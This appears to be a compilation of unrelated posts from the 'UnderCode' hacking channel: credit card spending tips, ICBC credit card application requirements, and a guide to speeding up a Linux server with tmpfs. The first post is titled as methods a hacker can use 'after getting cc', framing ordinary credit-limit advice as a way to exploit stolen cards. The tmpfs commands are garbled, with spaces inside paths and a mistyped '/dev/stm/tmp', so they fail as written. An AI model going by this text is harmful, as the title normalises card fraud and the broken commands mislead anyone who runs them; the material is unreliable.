WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Four bank card usage methods-some hacker can used after getting cc
t.me/UnderCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Multi-dimensional and multi-scenario consumption. Shopping in malls, supermarket consumption, restaurant meals, airport ticket purchases, etc. Multi-scenario consumption and multi-dimensional consumption are the preferred methods for banks to use cards.

2) Monthly credit card spending accounts for more than half of the credit card limit. Banks like this method of using cards. In this way, the card is used to show that the cardholder really needs to swipe the card. If this demand lasts for more than 3 months and there is no abnormal use of the card, the bank will basically give you an increase

3) often in installments, often withdraw cash. These two are the main sources of revenue for bank credit card centers. The installment fee, cash withdrawal interest and commission fee are all paid by the cardholder to the bank. If cardholders often have the need for instalments and cash withdrawals, which brings profits to the bank's credit card center, of course the bank likes to raise funds for you.

4) Repay on time. All the monthly repayments should be repayable, and there is no overdue behavior, indicating that cardholders will not bring bad debt risk to the bank, and the bank likes such quality customers.


WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to apply for ICBC Credit Card? What are the application requirements?
T.me/underCodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

There are three main requirements to apply for an ICBC credit card
　　Let me introduce you in detail below.

　　The most important requirements for applying for an ICBC credit card are to meet the following three conditions:

　　1. Age requirements: Generally a citizen who has reached the age of eighteen, you need to submit an identity document for certification.

　　2. Stable repayment ability: Generally you are required to provide proof of work and income. In order to increase the application success rate and credit limit, it is generally recommended to provide proof of own real estate, proof of own vehicle, proof of bank assets, etc. The standards for issuing cards are different for each bank, depending on the bank requirements.

　　3. The credit status is good: that is, you are required to have no bad credit history, and the bank will inquire on its own.

　　ICBC Credit Card Master Card Processing Conditions

　　A natural person who is over 18 years of age and has full capacity for civil conduct, a work unit or a fixed residence where the card issuer is located, has a stable income and is above the local average level, and can apply for a peony credit card at any local ICBC business outlet. .

　　ICBC Credit Card Gold Card Requirements

　　If you want to apply for ICBC Gold Credit Card, in addition to meeting the above conditions, there are some other conditions.

　　1.The applicant is a VIP customer of ICBC;

　　2. The applicant's monthly income is over 10,000 and is very stable;

　　3. At least four-star ICBC customers.

　　Note: If you choose “Yes” after you apply for a credit card under “Unable to approve the card grade, agree with the bank to automatically issue other grades of products”, then when the gold card is not approved, a general card may be issued for you.

　　If the gold card application is unsuccessful, you are advised to use an ICBC credit card more often and repay it on the repayment date in order to gradually accumulate a good card record and lay a credit foundation for future gold card upgrades.

　　ICBC Credit Card Online Application Conditions

　　1.The conditions for the application of the main credit card of ICBC must be met;

　　2.The resident city has ICBC business outlets;

　　3.The city where the card is selected must be the place of your work unit or fixed residential address;

　　4. Fill in the credit card online application information as required.

　　Units apply for ICBC Peony Credit Card

　　All party and government agencies, social organizations, enterprises and institutions that have an account opening permit issued by the People's Bank of China, open a basic deposit account or a general deposit account at an ICBC domestic branch, have legal personality, or are legally registered with relevant departments can apply Peony Unit Card (Business Card).

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Speed Optimization-Use tmpfs to speed up your Linux server by undercode
twitter.com/UnderCodeNews

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> cache files today and learned a trick is to use the virtual disk to store squid and seesion of php. A lot faster!

1) The default system will load / dev / shm, which is the so-called tmpfs. Some people say it is different from ramdisk (virtual disk). Like a virtual disk, tmpfs can use your RAM, but it can also use your swap partition for storage. Moreover, the traditional virtual disk is a block device and requires a command such as mkfs to really use it. Tmpfs is a file system, not a block device; you just install it and it will work.
tmpfs has the following advantages:
The size of the dynamic file system;

2) Another major benefit of tmpfs is its lightning speed. Because a typical tmpfs file system resides entirely in RAM, reading and writing can be almost instantaneous;

3) tmpfs data is not retained after a restart, because virtual memory is inherently volatile. So it is necessary to do some scripts for operations such as loading and binding.

🦑 Okay, let ’s talk about some road principles, everyone is annoying, let ’s talk about my application :)

1) First, create a tmp folder in / dev / shm, and then bind it with the actual / tmp:
mkdir / dev / shm / tmp
chmod 1777 / dev / shm / tmp
mount --bind / dev / shm / tmp / tmp

2) Application example: 1. Squid cache directory settings
vi /etc/squid/squid.conf
Modify it to
cache_dir ufs / tmp 256 16 256

3) The first 256 here means using 256M memory, I think the method of using ramdisk is not as good Use tmpfs directly, at least without using mkfs each time, and can also change the size dynamically. / Tmp at

4) this time is actually dev / shm / tmp.
Then restart the service, ok, now all squid cache files are saved in the tmpfs file system, soon.

🦑 Optimization of PHP performance

1) For a website with a large number of visits to Apache + PHP, there may be many temporary files under tmp, such as seesion or some cache files, then you can save it to a tmpfs file.

2) The way to save the seesion is very simple, just modify php.ini. Since I have bound / dev / stm / tmp to / tmp, it is not necessary to rewrite. As for the cache file generated by the php program, it can only be changed by itself. Php program

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁